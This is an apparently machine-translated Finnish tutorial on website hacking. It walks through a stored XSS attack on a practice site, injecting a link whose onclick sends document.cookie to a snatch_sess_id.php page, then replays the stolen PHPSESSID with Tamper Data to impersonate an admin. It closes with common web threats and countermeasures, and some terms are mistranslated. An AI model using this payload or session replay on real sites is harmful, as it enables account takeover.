Kuinka hakkeroida verkkosivusto? Yleiset sivustojen hakkerointitekniikat

Verkkosivustojen hakkerointitekniikat

Enemmän ihmisiä on pääsy Internetiin kuin koskaan ennen. Tämä on saanut monet organisaatiot kehittämään verkkopohjaisia ​​sovelluksia, joita käyttäjät voivat käyttää verkossa vuorovaikutuksessa organisaation kanssa. Verkkosovellusten huonosti kirjoitettua koodia voidaan hyödyntää luvattoman pääsyn saamiseksi arkaluontoisiin tietoihin ja verkkopalvelimiin.

Tässä opetusohjelmassa opit hakkeroimaan verkkosivustoja, ja me esittelemme sinulle verkkosovellusten hakkerointitekniikat ja vastatoimenpiteet voit suojata tällaisilta hyökkäyksiltä.

Kuinka hakkeroida verkkosivusto

Tässä verkkosivuston hakkeroinnin käytännön skenaariossa aiomme kaapata verkkosovelluksen käyttäjäistunnon osoitteessa www.techpanda.org. Käytämme sivustojen välistä komentosarjaa eväste-istunnon tunnuksen lukemiseen ja sen avulla esiintymään laillisena käyttäjäistunnona.

Oletuksena on, että hyökkääjällä on pääsy verkkosovellukseen ja hän haluaisi kaapata muiden samaa sovellusta käyttävien käyttäjien istunnot. Tämän hyökkäyksen tavoitteena voi olla järjestelmänvalvojan pääsy verkkosovellukseen olettaen, että hyökkääjän käyttöoikeus on rajoitettu.

Vaihe 1) Avaa URL -osoite http://www.techpanda.org/.

Käytännössä on erittäin suositeltavaa hankkia pääsy SQL-injektion avulla. Katso tästä artikkeli saadaksesi lisätietoja sen tekemisestä.

Vaihe 2) Anna kirjautumistiedot.

Kirjautumissähköpostiosoite on admin@google.com, salasana on Password2010.

Vaihe 3) Tarkista kojelauta.

Jos olet kirjautunut sisään onnistuneesti, saat seuraavan kojelaudan

Vaihe 4) Kirjoita uusi sisältö.

Napsauta Lisää uusi yhteystieto ja kirjoita seuraava etunimeksi

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Vaihe 5) Lisää Javascript.

Yllä oleva koodi käyttää JavaKäsikirjoitus. Se lisää hyperlinkin onclick-tapahtumaan. Kun hyväuskoinen käyttäjä napsauttaa linkkiä, tapahtuma hakee PHP eväste-istuntotunnus ja lähettää sen osoitteeseen snatch_sess_id.php sivu yhdessä istunnon tunnuksen kanssa URL-osoitteessa

Vaihe 6) Lisää tiedot.

Anna loput tiedot alla olevan kuvan mukaisesti ja napsauta Tallenna muutokset

Vaihe 7) Tarkista kojelauta.

Kojelautasi näyttää nyt seuraavalta näytöltä

Vaihe 8) Tarkista istunnon tunnus.

Koska sivustojen välinen komentosarjakoodi on tallennettu tietokantaan, se ladataan aina, kun käyttäjät kirjautuvat sisään.

Oletetaan, että järjestelmänvalvoja kirjautuu sisään ja napsauttaa hyperlinkkiä, jossa lukee Dark

Hän saa ikkunan, jonka URL-osoitteessa näkyy istunnon tunnus

Huomautuksia: komentosarja saattaa lähettää arvon jollekin etäpalvelimelle, johon PHPSESSID on tallennettu, sitten käyttäjä ohjataan takaisin verkkosivustolle ikään kuin mitään ei olisi tapahtunut.

Huomautuksia: saamasi arvo voi olla erilainen kuin tällä verkkosivulla hakkeroinnin opetusohjelma, mutta konsepti on sama

Istunto toisena henkilönä esiintyminen käyttäen Firefox ja Tamper Data -lisäosa

Alla oleva vuokaavio näyttää vaiheet, jotka sinun on suoritettava tämän harjoituksen suorittamiseksi.

• Tarvitset Firefox verkkoselain tälle osalle ja Tamper Data -lisäosa
• avoin Firefox ja asenna lisäosa alla olevien kaavioiden mukaisesti

• Etsi peukalointitiedot ja napsauta sitten asennuspainiketta yllä olevan kuvan mukaisesti

• Napsauta Hyväksy ja asenna…

• Napsauta Käynnistä uudelleen nyt, kun asennus on valmis
• Ota valikkopalkki käyttöön Firefox jos sitä ei näytetä

• Napsauta työkaluvalikkoa ja valitse peukalointitiedot alla olevan kuvan mukaisesti

• Saat seuraavan ikkunan. Huomautus: Jos Windows ei ole tyhjä, paina tyhjennyspainiketta

• Napsauta Käynnistä Tamper -valikkoa
• Vaihda takaisin kohtaan Firefox verkkoselain, kirjoita http://www.techpanda.org/dashboard.php Lataa sitten sivu painamalla Enter-näppäintä
• Saat seuraavan ponnahdusikkunan Tamper Datasta

• Ponnahdusikkunassa on kolme (3) vaihtoehtoa. Peukalointi-vaihtoehdon avulla voit muokata HTTP-otsikkotietoja ennen kuin ne lähetetään palvelimelle.
• Klikkaa sitä
• Saat seuraavan ikkunan

• Kopioi PHP-istunnon tunnus kopioit hyökkäyksen URL-osoitteesta ja liitit sen yhtäläisyysmerkin jälkeen. Arvosi pitäisi nyt näyttää tältä

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Napsauta OK-painiketta
• Näet uudelleen Tamper data -ponnahdusikkunan

• Poista valintaruudusta, joka kysyy Jatketaanko peukalointia?
• Napsauta lähetä-painiketta, kun olet valmis
• Sinun pitäisi pystyä näkemään kojelauta alla olevan kuvan mukaisesti

Huomautuksia: emme kirjautuneet sisään, esiintyimme sisäänkirjautumisistunnona käyttämällä PHPSESSID-arvoa, jonka haimme sivustojen välisellä komentosarjalla

Mikä on verkkosovellus? Mitä verkkouhat ovat?

Verkkosovellus (alias verkkosivu) on asiakas-palvelin-malliin perustuva sovellus. The palvelin tarjoaa pääsyn tietokantaan ja liiketoimintalogiikkaa. Sitä isännöidään verkkopalvelimella. Asiakassovellus toimii asiakkaan verkkoselaimessa. Verkkosovellukset kirjoitetaan yleensä kielillä, kuten Java, C# ja VB.Net, PHP, ColdFusion Markup Language jne. verkkosovelluksissa käytettyjä tietokantamoottoreita ovat mm. MySQL, MS SQL Server, PostgreSQL, SQLite, Jne

Suosituimmat verkkosivustojen hakkerointitekniikat

Useimmat verkkosovellukset sijaitsevat julkisilla palvelimilla, joihin pääsee Internetin kautta. Tämä tekee niistä haavoittuvia hyökkäyksille helpon saatavuuden vuoksi. Seuraavat ovat yleisiä verkkosovellusuhkia.

• SQL Injection – Tämän uhan tavoitteena voi olla sisäänkirjautumisalgoritmien ohittaminen, tietojen sabotointi jne.
• Palvelunestohyökkäykset– Tämän uhan tavoitteena voi olla estää laillisten käyttäjien pääsy resurssiin
• Cross Site Scripting XSS– Tämän uhan tavoitteena voi olla koodin syöttäminen, joka voidaan suorittaa asiakaspuolen selaimessa.
• Eväste/istuntomyrkytys– Tämän uhan tavoitteena on muokata hyökkääjän evästeitä/istuntotietoja päästäkseen luvatta.
• Lomakkeen peukalointi – Tämän uhan tavoitteena on muokata lomaketietoja, kuten hintoja verkkokauppasovelluksissa, jotta hyökkääjä voi saada tuotteita alennettuun hintaan.
• Koodin injektio - Tämän uhan tavoitteena on syöttää koodia, kuten PHP, Pythonjne. jotka voidaan suorittaa palvelimella. Koodi voi asentaa takaovia, paljastaa arkaluontoisia tietoja jne.
• defacement– Tämän uhan tarkoitus on muokata verkkosivustolla näytettävää sivua ja ohjata kaikki sivupyynnöt yhdelle sivulle, joka sisältää hyökkääjän viestin.

Kuinka suojata verkkosivustosi hakkeroilta?

Organisaatio voi suojautuakseen verkkopalvelinhyökkäyksiltä seuraavan käytännön mukaisesti.

• SQL Injection – käyttäjäparametrien puhdistaminen ja validointi ennen niiden lähettämistä tietokantaan käsittelyä varten voi auttaa vähentämään mahdollisuuksia joutua hyökkäyksiin SQL Injection. Tietokantakoneet, kuten MS SQL Server, MySQLjne. tukiparametreja ja valmisteltuja lausuntoja. Ne ovat paljon turvallisempia kuin perinteiset SQL-käskyt
• Palvelunestohyökkäykset – palomuurien avulla voidaan pudottaa liikennettä epäilyttävästä IP-osoitteesta, jos hyökkäys on yksinkertainen DoS. Verkkojen ja tunkeutumisen havaitsemisjärjestelmän oikea konfigurointi voi myös auttaa vähentämään a DoS hyökkäyksen onnistunut.
• Sivustojen välinen komentosarja – otsikoiden, URL-osoitteen kautta välitettyjen parametrien, lomakeparametrien ja piiloarvojen vahvistaminen ja puhdistaminen voi auttaa vähentämään XSS-hyökkäyksiä.
• Eväste/istuntomyrkytys – tämä voidaan estää salaamalla evästeiden sisältö, ajastamalla evästeet jonkin ajan kuluttua, yhdistämällä evästeet asiakkaan IP-osoitteeseen, jota käytettiin niiden luomiseen.
• Muotokarkaisu - tämä voidaan estää tarkistamalla ja tarkistamalla käyttäjän syöte ennen sen käsittelyä.
• Koodin lisäys – tämä voidaan estää käsittelemällä kaikkia parametreja datana suoritettavan koodin sijaan. Tämän toteuttamiseen voidaan käyttää desinfiointia ja validointia.
• Turvotus – Hyvän web-sovelluskehityksen tietoturvapolitiikan tulisi varmistaa, että se sinetöi yleisesti käytettyjä haavoittuvuuksia päästäkseen verkkopalvelimeen. Tämä voi olla oikea käyttöjärjestelmän kokoonpano, verkkopalvelinohjelmisto ja parhaat tietoturvakäytännöt verkkosovelluksia kehitettäessä.

Tarkista tämä: 9 parasta URL-skanneria, joilla linkki on turvassa haittaohjelmilta

Yhteenveto

• Verkkosovellus perustuu palvelin-asiakasmalliin. Asiakaspuoli käyttää verkkoselainta päästäkseen palvelimen resursseihin.
• Verkkosovellukset ovat yleensä käytettävissä Internetin kautta. Tämä tekee niistä alttiita hyökkäyksille.
• Verkkosovellusuhkiin kuuluvat SQL Injection, Code Injection, XSS, Defacement, Cookie myrkytys jne.
• Hyvä tietoturvakäytäntö verkkosovelluksia kehitettäessä voi auttaa tekemään niistä turvallisia.